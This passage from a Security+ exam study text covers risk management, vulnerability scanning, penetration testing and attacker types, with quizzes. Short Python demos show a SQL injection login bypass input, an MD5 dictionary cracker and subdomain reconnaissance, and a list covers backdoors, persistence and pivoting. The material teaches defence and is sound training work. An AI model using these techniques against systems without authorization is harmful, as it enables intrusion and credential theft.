banning flash drives would be too much of a hassle, you could require malware scans
whenever they're connected, and prevent workstations from running executable files directly
from them. Since so many security controls can be considered part of this strategy, risk
mitigation can be considered the broadest security strategy.

Risk deterrence    Applying visible deterrent controls in order to discourage attacks or human error from
occurring in the first place. While this can easily be classified as just a form of mitigation,
some sources, including CompTIA, categorize it separately. Deterrent controls might include
bright lights and obvious guards around a secure facility. Deterrence can be especially
effective for safety threats: just labeling a high voltage wire will make people much less likely
to grab onto it.

Risk acceptance    Choosing not to apply security controls, and hoping that the risk just doesn't hurt you.
Acceptance is a good strategy when the others don't offer a cost-effective way to reduce risk,
and is especially common either with risks that are very unlikely, or very low in impact. For
example, you might not choose to take any special measures against the occasional theft of
paperclips or the risk of a devastating but very unlikely earthquake. You could also accept a
risk temporarily, when another strategy will take time to implement. Remember, ignoring a
risk only counts as acceptance when you know it's there in the first place: if you never
identified the threat at all, that's a failure in your threat assessment.

Risk management seldom completely eliminates risk: even avoidance strategies often just turn a high
probability threat into a very unlikely one. If the remaining residual risk is great enough you might want to
evaluate additional reduction methods, but eventually you'll need to accept what your security strategy can't
eliminate.

Risk mitigation
As an information security professional, a lot of your work is going to focus on risk mitigation, whether it's
choosing controls, implementing them, or enforcing them. Mitigation isn't just a strategy in itself: since it
encompasses so many different techniques, there are a number of mitigation strategies that you'll need to
choose from or use in combination. In large part, they correspond to the ways you can classify security
controls.

Technology controls    While some technical controls in your organization might be intended to protect physical
assets or personnel, especially in information systems you'll see them used to make sure
that valuable data isn't damaged, rendered unavailable, or especially leaked to the wrong
people. Data loss prevention (DLP) goals can be achieved by controls such as encryption,
firewalls, backup systems, and device hardening.

Policies and procedures    Administrative and operational controls are an important part of any risk mitigation
strategy. Even if technical controls will achieve most of your goals, you still need the
policies and procedures to ensure they're applied properly and consistently. For example,
even if your remote access system requires authentication, without a strong password
policy there's still a high risk of unauthorized logins.

Routine audits    Whatever your security settings, they must be periodically reviewed to look for
unauthorized changes or unnoticed problems. Audits can include review of user
permissions or security configurations, review of security logs to find suspicious activity,
vulnerability assessments, or more.

Incident management    When something does go wrong with security, you need to have an incident response
process to determine what harm was done, minimize or repair damage, and restore the
system to a secure state. You may also need to preserve evidence for later investigation.

Change management    When you change the configuration of a system or network, you run the risk of adding
new security vulnerabilities, or weakening existing security controls. Changing policies
and procedures can likewise compromise security. Any changes to your organization's
functions should be conducted as part of a change management process that assesses their
security impact and makes necessary adjustments.

Automated security
One problem when you enact any sort of risk mitigation is that humans are very fallible, especially when it
comes to day-to-day routine operations or maintaining complex systems. It only takes one mistake to leave a
critical vulnerability in place. The other problem is that manual configuration and monitoring of security is
labor-intensive, and all the more so when people have to check over each other's work.

Exam Objective: CompTIA SY0-501 3.8.1


Whenever possible, it's best to use automated procedures and tools to enact technical controls, audit
compliance, document security-related events, and anything else that can be done in a programmatic fashion.
Human oversight is still essential, but any good automated system can be designed to gather and present data
about its activities to assist in verification.
There are a wide variety of automated tools and products that may suit your security needs. Some include:
 Device or system configuration tools
 Continuous monitoring and alert systems
 Configuration validation tools
 Vulnerability scanners
 Remediation tools
 Patch management software
 Automated troubleshooters
 Application testers


Many automation tools rely on scripts, special programs designed to emulate what a user could do with a
sequence of manual actions. For example, a configuration validation tool for a web server might
consist of a list of sequential checks of server security settings. When you run it, it checks all of those settings
and then lists the results with far less time and effort than checking them by hand. Likewise, setting security
policies on a workstation might involve a script or database file with the settings you want, and a program that
will configure them all at once for you.
The lingering risk of any automated tool is that it can't check or change a setting unless it's been instructed to
do so, and computers have limited insight as to when an instruction is a bad idea. At some level any script,
alert, or configuration template must be configured by a human who can still make mistakes. On the up side,
if you save that much time using automation, you can at least spare some of it making sure your automated
tools are accurate and up to date.
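
As a rough illustration of that idea, here's a minimal configuration-check script. Everything in it is hypothetical: the setting names, the expected values, and the get_setting placeholder stand in for whatever your platform's real configuration interface provides.

    # Hypothetical security baseline for a web server.
    BASELINE = {
        "tls_minimum_version": "1.2",
        "directory_listing": "off",
        "admin_interface_bound_to": "127.0.0.1",
    }

    def get_setting(name):
        # Placeholder: a real tool would query the server's actual configuration.
        current = {"tls_minimum_version": "1.2",
                   "directory_listing": "on",
                   "admin_interface_bound_to": "127.0.0.1"}
        return current.get(name)

    # Check each setting in sequence and report any deviation from the baseline.
    for setting, expected in BASELINE.items():
        actual = get_setting(setting)
        status = "OK" if actual == expected else f"MISMATCH (found {actual!r})"
        print(f"{setting}: {status}")

The same pattern scales up: the script does the tedious checking, while a human reviews the mismatches and keeps the baseline itself accurate.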

Securing the security assessment


Different security documents need to be distributed or secured in different ways. Public rules should be
widely distributed, employee procedures to whoever needs to use them to perform a job securely, security
configuration data only to administrators who will enforce it, and so on. A risk assessment is one of the most
sensitive types of document, since it can be a treasure map showing the way right through your defenses. It
lists your valuable assets, the vulnerabilities you know about, and how you've chosen to secure them.
Attackers who see the results of your assessment can look for an unlikely threat you've decided not to protect
against, and target it specifically. They might also be able to judge residual risks left after a mitigation
strategy, or even worse notice a threat vector you overlooked and failed to protect against.
Any kind of security assessment, whether it's focused on threats, risks, or vulnerabilities, needs to be treated
as sensitive information and distributed on a need-to-know basis. Even if someone's involved in the process,
that doesn't mean they need to have access to everything; it might be more appropriate to simply give them
the details relevant to their responsibilities and areas of expertise. For that matter, non-technical upper
management might not even want more than a clear set of bullet points and a cost/benefit analysis to review;
if so, that's exactly what you should give them. The fewer eyes that see the full details of your security
posture, the fewer there are who can take malicious action or accidentally leak information to someone who
will.

Discussion: Managing risks


If you didn't already perform the "Beginning a risk assessment" discussion, you'll need an asset, a list of
threats to it, and the impact and probability of each threat.
1. Would it be more appropriate to perform a qualitative risk analysis, or a quantitative one?
It depends on the asset you’ve chosen and the threats you've listed. You might need to use a combination
of both.
2. How could you perform a quantitative risk assessment on assets and impacts without clear monetary
values attached?
As long as you have consistent, internally repeatable numbers, you can perform a quantitative analysis
using performance metrics from automated tools, uptime values, or anything else that can be calculated
and maps to business benefits and costs.
3. For each risk you've identified, suggest at least one method to manage it. Identify the method's underlying
strategy, the type of control it employs, and whether it could be automated.
Answers will vary.
4. If your work so far was used in a formal risk assessment, how would the document be useful to an
attacker?
Specific answers may vary, but an attacker can use detailed knowledge of the controls you deploy, and of
the ones you have chosen not to, in order to plan an attack.


Assessment: Risk management


1. Order the steps of a complete risk assessment.

1. Analyze business impact
2. Conduct a threat assessment
3. Create a mitigation strategy
4. Evaluate threat probability
5. Identify assets at risk
6. Prioritize risks

Correct order: 5, 2, 1, 4, 6, 3 (identify assets, threat assessment, business impact, threat probability, prioritize risks, mitigation strategy)
2. Qualitative risk assessment is generally best suited for tangible assets. True or false?
 True
 False

3. You're shopping for a new A/C unit for your server room, and are comparing manufacturer ratings. Which
combination will minimize the time you'll have to go without sufficient cooling? Choose the best
response.
 High MTBF and high MTTR
 High MTBF and low MTTR
 Low MTBF and high MTTR
 Low MTBF and low MTTR

4. Your company has long maintained an email server, but it's insecure and unreliable. You're considering
just outsourcing email to an external company who provides secure cloud-based email services. What risk
management strategy are you employing? Choose the best response.
 Risk acceptance
 Risk avoidance
 Risk deterrence
 Risk mitigation
 Risk transference

5. What element of your risk mitigation strategy helps keep future additions to your network from
introducing new security vulnerabilities? Choose the best response.
 Change management
 Incident management
 Security audits
 Technical controls


Module C: Vulnerability assessment


As a security professional, you need to be constantly aware of the vulnerabilities in your organization. When
you perform a risk assessment, you need to know the existing vulnerabilities of your assets. Once you apply
mitigation techniques, you need to test their effectiveness. Even as part of periodic assessments, you need to
search for new or overlooked vulnerabilities. While actually performing vulnerability assessments requires
technical knowledge about attacks and data systems covered later in this course, the underlying process is just
a matter of understanding your security goals.
You will learn:
 About vulnerability testing
 How to perform vulnerability scans
 How to plan a penetration test

About vulnerability assessments


Vulnerability assessments can take many forms: the common theme between them all is that they search for
vulnerabilities that might otherwise go unnoticed. Some focus on computing assets, such as hosts and network
resources; others reach further into other aspects of your organization. The most effective assessments rely on
a combination of techniques, but since some methods are easily automated while others are more labor
intensive, you might want to perform different assessments at different times as part of an ongoing process.
For example, a comprehensive vulnerability assessment of a network and all of its components would at the
minimum require the following elements.

Baseline review Comparing actual network performance to your security baseline, or existing security
configuration. The review should look not only for security settings that don't match the
baseline expectations, but also for events and usage patterns that don't match expected
values. Performance issues in particular could represent DoS attacks, rogue server
activity, or even overly restrictive security settings slowing down the network. Even
when performance-related deviations from the baseline don't turn out to be security
related, network administrators should be made aware of potential performance
problems.
Determining the attack surface    The network's attack surface is all of the software and services installed which can be
subject to attack. Network hardening is intended to reduce the attack surface by removing
unnecessary services and blocking potential attack vectors. Beyond simply reviewing
device configurations, vulnerability scanning tools are one of the primary ways of testing
a network's attack surface. Penetration tests are another.
Reviewing code Insecure application design is one of the chief sources of network vulnerability. Not only
should software used on the network be validated for security before it's installed, but it
should be reviewed for potential problems after updates, when there's a reason to suspect
a problem, or just as part of periodic comprehensive review processes. It's most
important to have a security tester review all code for custom or in-house applications
since they're entirely your organization's responsibility, but outside applications should be
reviewed as well. While you can't directly review the code for proprietary applications,
you can make sure you choose software from trusted vendors, and regularly check for
published vulnerabilities from the vendor or the security community.


Reviewing architecture    Vulnerabilities in system architecture, both hardware and software, are another source of
risk. To some extent this might sound like making sure hosts are up to date and have
antivirus software installed, but it goes deeper than that. For example, processors in
newer systems include hardware features preventing many application attacks that can be
used against older systems, and newer operating systems more strictly control application
privileges that could be exploited in the past. Some systems have optional features
specifically designed for high security environments. Making sure that network hosts and
devices have an architecture that meets their required security level will help keep your
network secure, as will watching for new developments which you can use for future
upgrades.
Reviewing design When you configure systems, assemble networks, design applications, or apply any sort
of new solution, you need to review its design and make sure it doesn't have any
outstanding security vulnerabilities. This includes security policies themselves. Not only
is it good practice to make sure your organization checks its own work, but design review
is important for professional and legal reasons as well: if something serious does go
wrong, demonstrating due diligence in securing the network can reassure stakeholders
and shield you and your organization from liability.

Vulnerability scans vs. penetration tests


Two of the most frequently discussed approaches to vulnerability assessment are vulnerability scans and
penetration tests. The problem is that casual discussion frequently conflates the two, or describes one as the
other, so it's important to understand the distinction.

Exam Objective: CompTIA SY0-501 1.4.10, 1.5.1, 5.3.2.11


A vulnerability scan is a broad and fundamentally passive scan that examines the entire system, network, or
organization, checking for a specific list of known vulnerabilities. The scanning process might be passive and
invisible to security systems, or it might be active and prone to set off alarms, but it doesn't actually aim to
compromise assets so much as catalog ways they could be compromised. If you know your organization has
security vulnerabilities and want to discover and fix as many as possible, a vulnerability scan is the best way
to go.
A penetration test is a simulated attack designed to prove that an asset can be compromised. The penetration
tester, who may or may not have detailed knowledge of existing security controls, uses known attack methods
to bypass security and compromise the system. If the attack fails, the system has passed the test. A penetration
test is active and intrusive, but more focused, and isn't likely to uncover vulnerabilities not directly between
the tester and the goal. If you think your system is secure, but want to confirm your work, a penetration test
might be a good way to do it.
In information security, both vulnerability scans and penetration tests generally refer to tests against systems
and networks specifically, but like many security concepts they can apply just as well to any level or type of
organizational security, and might even be easier to compare in that context. Imagine that you're the head of
security for an art collection.
 To conduct a vulnerability scan, you might personally go through the whole building with checklist in
hand and methodically search for problems. At the end you'd have a list of every unlatched window,
easily picked lock, weak security code, unresponsive alarm sensor, and camera blind spot you could
find.
 To conduct a penetration test, you might hire a skilled ex-burglar turned security consultant, and give a
simple challenge. "By this time next month, I want you to steal the velvet Elvis I stashed in with the
third floor collection, without being detected by any guards." If the painting goes missing, you
obviously have room to tighten up security, and the burglar can probably give some suggestions how.


This example highlights another important point about vulnerability testing: in both cases you'll want to make
sure the rest of your security staff, and general management, knows there's testing going on. Even if the
guards shouldn't know exactly when and how the attack will transpire, you don't want the burglar to be
arrested or shot. Even if you're just probing existing defenses, you don't want security to overreact to an alarm
going off, or a report of someone trying to open a window from the outside.

WARNING: The same is true when you test network or host security: before you perform a vulnerability
scan or especially a penetration test, you need to make sure you have the knowledge and written consent
of network administrators and management. If you're caught making unauthorized probes or attacks,
they wouldn't be wrong to suspect you're an attacker yourself, and you might soon find yourself facing
disciplinary action or even criminal charges.

Vulnerability scan types


A vulnerability scan is fundamentally a passive test of security controls. It doesn't actually attack or
compromise any resources: instead it just looks for vulnerabilities that would allow a real attack to succeed.
One of the most common ways to scan for vulnerabilities is a software application called a vulnerability
scanner. Vulnerability scanners might target network services, operating systems, specific applications and
devices, or a combination of the above. Popular examples of comprehensive vulnerability scanners include
the proprietary SAINT and Nessus, and the open source OpenVAS. A good vulnerability scanner will probably
become popular both with security testers and with hackers: the only difference is whether the person using it
plans to use the findings to close vulnerabilities or to exploit them.

Exam Objective: CompTIA SY0-501 1.5.5, 1.5.6, 2.2.5, 2.2.13


Scans can be intrusive or non-intrusive. A non-intrusive scan focuses on monitoring communications, or
making routine requests that reveal details about the system and its potential
vulnerabilities, but won't do any harm. It might set off security alarms, though, if the network has a system
configured to watch for scans an attacker might perform. By contrast, an intrusive scan might use larger
traffic volumes, unusual messages, or attempts to gain system permissions. It's still less invasive than a real
penetration test, and it won't deliberately compromise systems, but an intrusive scan is much more likely to
trigger security alarms, and might even disrupt or crash vulnerable or unstable systems as a side effect.

Note: Just because a scan is non-intrusive doesn't mean you don't need permission to perform it, or that
it won't be noticed.
Scans can also be credentialed or non-credentialed. A non-credentialed, or non-authenticated scan doesn't use
any special permissions or user credentials: it approaches the system or network in much the way that an
outside visitor would see it. A credentialed, or authenticated scan requires user credentials for the hosts or
resources being scanned. This can give you much more information, since you can directly view security
configuration data that a non-credentialed scanner has to poke around and guess at. It's also less intrusive and
generates less traffic: if you can directly query a host's operating system about what application ports it has
open, you don't need to send requests to thousands of separate ports over the network to see which reply.

Goals of vulnerability scanning


Depending on the type of vulnerability scan you're making, you might be targeting any combination of
network devices, operating systems, applications, or existing security settings. Especially when you use
automated tools you'll be looking for known, generally common vulnerabilities or other problems from a list.
What's on the list depends entirely on your search methods, but potential problems fall into a number of
categories.

Exam Objective: CompTIA SY0-501 1.5.2, 1.5.3, 1.5.4, 1.5.7, 1.6.9, 1.6.14, 2.3.8


Missing security controls: The scan might turn up common security measures that aren't installed or have been disabled. For example, a host's firewall software might be turned off, or a wireless access point might be open and unencrypted.

Open ports: Most network scanners search for open network ports on hosts, each of which represents a network service that is running and not blocked by a firewall. If a service is properly secured and serves an important function, the open port isn't a problem. If it's insecure, unauthorized, or just unnecessary, it's a potential vulnerability.

Weak passwords: Scans can include password cracking attempts, or checks for default username/password combinations on network devices. If an automated scan can find user credentials for a resource, an attacker certainly can.

Weak encryption: Many network protocols use cryptographic controls for security, but there are a lot of encryption standards. Some are seriously flawed or outdated, and easily cracked by an attacker. Weak encryption is a vulnerability because it can be cracked, and because it can give a false sense of security. (A sketch of one such check appears after this list.)

Misconfigured security controls: Hosts, devices, and applications can all have configuration problems that compromise security. Depending on your scan, you might look for particular common mistakes, or you might compare settings against a standard baseline and look for deviations.

Unsecured data: Data can be stored in the wrong place on the network, or without adequate security controls. DLP software can include features to recognize sensitive data that isn't properly secured.

Compromised systems: It's possible that a vulnerability scan can pick up signs of compromised security, such as rogue servers, malware infection, unauthorized user accounts, or deliberately sabotaged security controls.

Exploitable vulnerabilities: Every operating system or application has programming flaws that an attacker can exploit. Many scanners are designed to check target systems against known common exploits so that you can patch or otherwise secure them.

Unpatched systems: Scanners, especially credentialed ones, can sometimes check version and update status for device firmware, operating systems, or application software. Security updates for any of these might contain patches for vulnerabilities, even ones you're not specifically scanning for.
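As an example of the weak-encryption checks above, the following sketch in Python attempts a TLS handshake using outdated protocol versions; a server that still accepts them is a finding worth reporting. The target host is hypothetical, and the sketch assumes the local OpenSSL build still allows these legacy versions to be negotiated at all.

import socket
import ssl

# Hypothetical target; replace with a host you're authorized to test.
HOST, PORT = "www.example.com", 443

# Explicitly negotiate each legacy version. If the handshake succeeds,
# the server still accepts that (weak) protocol.
legacy_versions = {
    "TLSv1.0": ssl.TLSVersion.TLSv1,
    "TLSv1.1": ssl.TLSVersion.TLSv1_1,
}

for name, version in legacy_versions.items():
    ctx = ssl.create_default_context()
    ctx.check_hostname = False      # we only care about protocol support here
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = version
    ctx.maximum_version = version
    try:
        with socket.create_connection((HOST, PORT), timeout=5) as sock:
            with ctx.wrap_socket(sock, server_hostname=HOST):
                print(f"{HOST} still accepts {name}")
    except (ssl.SSLError, OSError):
        print(f"{HOST} rejected {name}")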

Vulnerability scanners aren't perfect. Not only will they miss vulnerabilities they're not programmed to recognize, they can also report false positives. In the context of vulnerability scanning, this means the scanner
thinks it's found a vulnerability but it's actually not a problem or has been mitigated by another security
control the scan didn't detect. This can lead you to spend resources diagnosing or fixing problems that aren't
really there. In some cases, you might have to actually test a vulnerability to determine whether it's genuine.

Discussion: Vulnerability assessments


1. If a credentialed vulnerability scan gives more information and generates less traffic, why run a non-
credentialed scan?
A non-credentialed scan gives a more accurate depiction of what an outside attacker would see, so it can help you find which vulnerabilities are most likely to be attacked.
2. What is the attack surface of your local network?
Exact answers may vary, but it includes the hosts, devices, and network services an attacker might search
for vulnerabilities in.


3. To your knowledge, are all the computers and devices on your local network updated and configured with
security software?
Answers may vary, but even if you think so you'd need the results of a vulnerability scan to verify it.

Penetration testing
Just like a vulnerability scan, how far you take a penetration test depends on your security needs and the
resources you want to put toward it. Likewise, some elements can be performed by automated tools while
others require intense human review. The biggest difference is that the penetration test is fundamentally active
and intrusive. You're not just examining the system to look for where it might break: instead, you're picking
one or more expected weak points and actually trying to hammer them open.
The best penetration tests require significant research and expertise. While you could in theory perform a
penetration test against the security controls you installed, you're probably not the best person. No matter your
skills, someone with a different perspective and knowledge can give a much better simulation of an attacker
trying to out-think you. This could be another security expert in your organization who was less involved in
designing the system, but for more formal testing it's popular to hire an outside consultant. One good choice is
a white hat or ethical hacker. A white hat hacker has the same skills and tools as a criminal black hat hacker
or cracker, but only uses them to test and improve security systems. Large organizations sometimes assemble or hire tiger teams or red teams made up of multiple white hats or other security experts working
in concert to penetrate security systems.

Goals of penetration testing


At its core, a penetration test is designed to verify that a theoretical threat exists—not in the sense of "does
this attack exist at all?", but rather "can this attack really damage my newly secured system?" If the tester
can't compromise the system, it means your security controls are a success; you still have to maintain and
improve security in the future, but for now you've done a good job. If the tester succeeds, it means you've got
more work to do before you can call your system secure.
The precise goals and metrics of a particular test, by contrast, might vary quite a lot, especially depending on
the threats you're testing against. The "win" condition for the tester doesn't have to be stealing data: it could
also be disrupting network traffic, crashing essential systems, or anything else that harms your assets.
Penetration tests also don't always have to be a direct test against a specific vulnerability: they can use the full
range of techniques a hacker does, creatively exploiting vulnerabilities and bypassing security controls in
combination to compromise security step by step. Consider an example. As a penetration tester, your main
goal is to steal trade secrets from the company's file server. The server's been specially secured by host and
network security controls so that it can be accessed on its LAN, but not from outside the corporate network.
The security controls used seem pretty solid, but your network probing showed that the same part of the
network has a web server vulnerable to SQL injection, a type of database attack. By injecting the right
commands you can get remote login credentials on the web server. Once you've done that, you find the file
server isn't well protected against inside attack, and you're able to download the secret files.
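To make the web server step of that example more concrete, here's a minimal sketch in Python with SQLite of the kind of flaw SQL injection exploits; the table, account, and inputs are all hypothetical. Because user input is pasted directly into the query string, a crafted username rewrites the query's logic.

import sqlite3

# A deliberately vulnerable login check; the data here is made up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'S3cret!')")

def vulnerable_login(name, password):
    # User input is pasted straight into the SQL string -- this is the flaw.
    query = (f"SELECT name FROM users "
             f"WHERE name = '{name}' AND password = '{password}'")
    return conn.execute(query).fetchone()

print(vulnerable_login("alice", "wrong guess"))    # None: password required
print(vulnerable_login("alice' --", "anything"))   # ('alice',): check bypassed

The usual fix is a parameterized query, where user input is passed as bound values rather than spliced into the SQL text.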
One thing penetration tests don't do is comprehensively scan for vulnerabilities like a vulnerability scan: you'll only know the status of the vulnerabilities the tester actually tested. In the previous example, your report to the system's owner will include the web server's SQL vulnerability and the weaknesses of the file server against inside attack. If there was also a firewall vulnerability you could have exploited, but didn't think of before you succeeded another way, it's still undiagnosed and leaves the network vulnerable.


The penetration testing process


The basic process of a penetration test is easy to understand even if you have little experience with the tools
and technologies involved. It's also a process every security professional should understand intimately; by and
large, it follows the same steps as the real attacks you'll need to defend against.
NIST breaks the process down into four main phases, though other sources group or subdivide them
differently.
 Planning
 Discovery
 Attack
 Reporting

As the illustration shows, the phases aren't strictly linear. If an attack doesn't work, the tester can return to the discovery phase for new leads instead of giving up. Likewise, reporting, the ultimate goal of the test, can draw on findings from any previous phase.
While it's possible for a penetration test to be carried out against production systems, there are many cases
where you wouldn't want to do that. In particular, penetration tests often include techniques that can disrupt
services, crash servers, or otherwise harm normal operations. In these cases, a useful substitute is a test
environment designed to duplicate the configuration and security controls of the production environment as
closely as possible.
You can also use such simulated environments to carry out other security exercises, such as testing new
controls or procedures, or training security personnel in a test environment before they protect production
systems.

Penetration test tools


In the movies hacking a system takes little more than a lot of fast typing in an ominously colored window, but
real penetration tests require a variety of tools. Depending on the nature of the test, almost any vulnerability
scanning tool might have a part; additionally, there is software specifically meant for penetration testing.
Password crackers and exploitation frameworks such as Metasploit or Core Impact are especially popular.
There are even entire operating system distributions designed for penetration testing, including a variety of
pre-configured tools. Options include Kali Linux, WHAX, and Pentoo. In more involved and expensive
penetration tests, tiger teams might write their own exploit software, custom designed for their chosen targets.
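As a small illustration of what one class of those tools does under the hood, here's a sketch in Python of the core loop of a dictionary password cracker; the captured hash and wordlist are hypothetical. Each candidate word is hashed and compared to the stolen hash.

import hashlib

# A hypothetical captured hash; here it's just the MD5 of "letmein".
stolen_hash = hashlib.md5(b"letmein").hexdigest()
wordlist = ["password", "123456", "qwerty", "letmein", "dragon"]

for guess in wordlist:
    # Hash each candidate and compare it to the stolen hash.
    if hashlib.md5(guess.encode()).hexdigest() == stolen_hash:
        print(f"Cracked: {guess}")
        break
else:
    print("No match in this wordlist")

Real crackers such as John the Ripper or Hashcat add mangling rules, enormous wordlists, and GPU acceleration, but the principle is the same.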

Exam Objective: CompTIA SY0-501 1.4.7, 1.4.8, 1.4.9, 2.2.7


The other important tool penetration testers have is their knowledge of the systems they're attacking.
Typically, this is carefully controlled as part of the nature of the test. There are three approaches that can be
taken with regard to tester knowledge.


Black box test: The tester is given no knowledge of the system before the test. Like a real hacker, the tester will need to research public sources of information about the organization and its assets, examine the network from the outside, and otherwise try to figure out what attacks might work before trying them. Black box testing can require lengthy research, and the tester can't easily discover all vulnerabilities, but it's a very realistic simulation of how security controls can hold up against outside attackers.

White box test: The tester is given full knowledge of existing security controls, system configurations, policies, and other documentation about the system and its potential vulnerabilities. The goal is to give the tester a complete understanding of the system and the ability to hit it where it's weakest. White box tests are the most thorough type of penetration test, and the hardest for even a strong security system to withstand, but they show what an attacker with a lot of inside information could do rather than giving an accurate picture of what an uninformed outside attacker could accomplish.

Gray box test: The tester is given some knowledge of the existing security configuration, but not a complete picture. The actual details can be anywhere between a white box and a black box: for example, the tester might be given a list of hosts along with their roles and network addresses, but not detailed security configurations.

Note: Don't confuse black and white box testing with black and white hat hackers. The former refers to
the attacker's knowledge, while the latter is a matter of intent.

Network reconnaissance
Planning to penetrate a network, whether you're a red team or a real attacker, can itself be broken into three
basic phases.

1. Passive reconnaissance
2. Active reconnaissance
3. Vulnerability analysis

Exam Objective: CompTIA SY0-501 1.4.1, 1.4.2


The goal of all three of these is to put together as complete an idea as possible of what assets the target has,
how they are arranged, and what ways you can achieve at least an initial foothold on their network. You might
not be able to tell absolutely everything yet, but once you're in the system you can perform even better
reconnaissance later.
If you're performing a white box test you'll already have a lot of network information, but in a black box test
you'll initially need to rely on open source intelligence you can gain from the outside. The best place to start is
by passive reconnaissance, or gathering whatever information you can about your target without directly
sending them any information about your presence. Targets of passive reconnaissance might include:
 The organization's website and public records
 News stories and press releases about the organization
 Contact names and email addresses
 Job boards
 Company privacy policies
 Social media and website posts by current or former employees


Active reconnaissance involves techniques that might tip the target off that they're being targeted, and how.
Active methods include network probes and direct contact with employees via social engineering. They also
include semi-passive techniques such as passive network scans that look like normal network traffic, and
subtler eavesdropping and other social engineering approaches that have a low chance of being recognized.
The difference between the two really is just a matter of degree, and how much you rely on which depends on
just how much time you have and how critical it is not to be noticed. For both, the goal is to paint a more
detailed picture of the network structure, individual servers and other assets, and employee behaviors and
policies.
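One low-noise example of active reconnaissance is checking whether common hostnames resolve under the target's domain. The sketch below is in Python; the domain and name list are hypothetical, and you should only probe domains you're authorized to test.

import socket

domain = "example.com"
common_names = ["www", "mail", "vpn", "remote", "intranet", "dev"]

for name in common_names:
    fqdn = f"{name}.{domain}"
    try:
        addr = socket.gethostbyname(fqdn)
        print(f"{fqdn} -> {addr}")
    except socket.gaierror:
        pass  # the name doesn't resolve; nothing learned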
Finally, vulnerability analysis is very much like running vulnerability assessments as a defender, except with
the goal of finding avenues of attack. This may require more scanning to be certain, or even launching
experimental attacks to gain access. In a particularly large scale penetration test, even the attackers might use
test systems to refine specific techniques before trying them against live defenders.

Penetrating networks
Once you figure out possible avenues of attack, you need to try them. The initial exploitation phase isn't the
end goal; in fact, against a network that practices defense in depth or has active defenders it may not get you
very far or last very long. This means that when you establish a foothold you need to act quickly and choose
your next step. Once you've successfully used an exploit you have three main approaches you can take, in any
order or combination.

Exam Objective: CompTIA SY0-501 1.4.3, 1.4.4, 1.4.5, 1.4.6

 Escalate privileges to get more control over the infiltrated system.
Escalating privileges is especially important when your initial access has strictly limited permissions.
• Gathering user names or password hashes to crack
• Gaining additional privileges through vulnerable processes
• Finding exploitable information in shared folders
• Installing malware that establishes administrative privileges
 Establish persistence, or ways that you can regain access if you lose it.
Persistence is especially important when your initial exploit can be easily discovered and halted, or if
it's a temporary exploit like hijacking an existing session.
• Installing backdoors
• Creating alternate accounts
• Compromising authentication systems to make further attacks easier
 Pivot to gain access to other systems on the network you could not view or access before.
• Perform reconnaissance on internal networks, using the compromised system as a vantage point
• Create tunnels to bypass firewalls and other network boundaries
• Exploit trust relationships to access additional systems


Discussion: Penetration testing


1. What's the difference between black, white, and gray box testing?
How much knowledge the attacker has about the system.
2. What advantages does a penetration test have over a vulnerability assessment?
A penetration test puts your defense to practical test against an outside attacker, and might find
vulnerabilities you hadn't anticipated.
3. Why can't penetration tests replace vulnerability assessments?
Penetration tests aren't comprehensive, especially if they're black or gray box. They only test
vulnerabilities the testers think of, and only those relevant to their goals.
4. As a black box tester, where would you find open source intelligence about your organization's security
assets?
Answers might include public records, news stories, social media postings, and job sites.
5. Why is the pivot a critical part of a penetration test?
If you can't view or access the entire network from outside, the initial exploit becomes your way to reach
further.


Assessment: Vulnerability assessments


1. A vulnerability scan can be intrusive or non-intrusive. True or false?
 True
 False

2. What steps might be taken as part of a vulnerability scan? Choose all that apply.
 Bypassing security controls
 Exploiting vulnerabilities
 Finding open ports
 Identifying vulnerabilities
 Passively testing security controls

3. What element of a vulnerability assessment compares security performance to existing security configuration documents? Choose the best response.
 Architecture review
 Baseline review
 Code review
 Design review

4. What kind of penetration test involves a tester with full knowledge of your network configuration?
Choose the best response.
 Black box
 Black hat
 White box
 White hat

5. Vulnerability scanners are a good way to determine a network's attack surface. True or false?
 True
 False

6. While conducting a penetration test you've just managed to get access to an important server. The main
problem is that you got it through a session hijacking attack that took both luck and precise timing, and
might be cut off at any time. Given limited time, what should your next step be? Choose the best
response.
 Escalate privileges
 Establish persistence
 Perform reconnaissance
 Pivot


Summary: Security fundamentals


You should now know:
 About security concepts such as the CIA triad and security controls; how to distinguish between risks,
threats, and vulnerabilities; how to apply secure design principles, and how to distinguish events and
incidents.
 How to identify assets and threats, and how to calculate and manage risk
 About vulnerability assessments, and how to plan vulnerability scans and penetration tests.



Chapter 2: Understanding attacks
You will learn
 How to categorize attackers
 About social engineering
 About network attacks
 About application attacks
 About malware


Module A: Understanding attackers


When you start off securing informational assets it's easy to just think in terms of what's vulnerable to
"hackers", but you can come up with far more effective defenses if you know what they want from you and
what tools they have at their disposal.
You will learn:
 How to categorize attackers by motivation
 How to categorize attackers by threat characteristics

About hackers
Originally, "hacker" wasn't a term for people who break into computers and steal things. It simply referred to
enthusiastic computer programmers who found intellectual challenge in their work. Since computers decades
ago were very limited in both hardware and software, a large part of this challenge was overcoming those
limitations and making computers or programs do things their initial designers never imagined. One of the
more literally colorful examples of this original form of hacking is the computer art subculture called the
"demoscene", where artists and programmers design complex audiovisual presentations called demos. The
original demos were designed for very simple home computers with tight hardware limitations, so it was very
challenging to include ever more impressive graphics, animations, and music. Demoscene programmers
developed many innovative workarounds to push the limits of common systems, as well as graphical
programming techniques that are still used in game design and 3D rendering.
While many of these early hackers were perfectly legitimate programmers working with systems and software
they had every right to experiment with, others already saw security measures as one more limitation to
overcome. Even the demoscene began with hackers who bypassed copy protection on early computer games
and applications. Many early hackers were also involved in phreaking, the practice of manipulating analog
telephone circuits, for example to make free long distance calls. As computers and networks developed
further these criminal hackers, or crackers, constantly devised new malware techniques and network attacks
to access them, either to steal information, damage systems or data, or just prove that they could get in. In the
public mind, it wasn't long before "hacker" came to mean specifically those who try to bypass security, rather than the other elements of the culture.
Whichever version of the term you use, hacking is alive and well today. When it comes to security, no matter how we protect our computers and networks there's no shortage of hackers coming up with sophisticated new attacks to undo those protections. Not all of them are even malicious. One of the simplest ways hackers divide themselves these days is by ethical boundaries.

Black hat: Criminal hackers who break computer security for personal gain or other malicious purposes. These are the dangerous attackers you have to worry about, who will steal or destroy information, spread malware, or otherwise damage your computing assets. They may work alone, in the employment of others, or in association with like-minded black hats.

White hat: Security experts who study and practice hacking, but only use it for legal purposes such as finding countermeasures against other hackers. Also known as ethical hackers. White hats often find employment finding vulnerabilities or performing penetration tests, but only act with the permission of system owners.

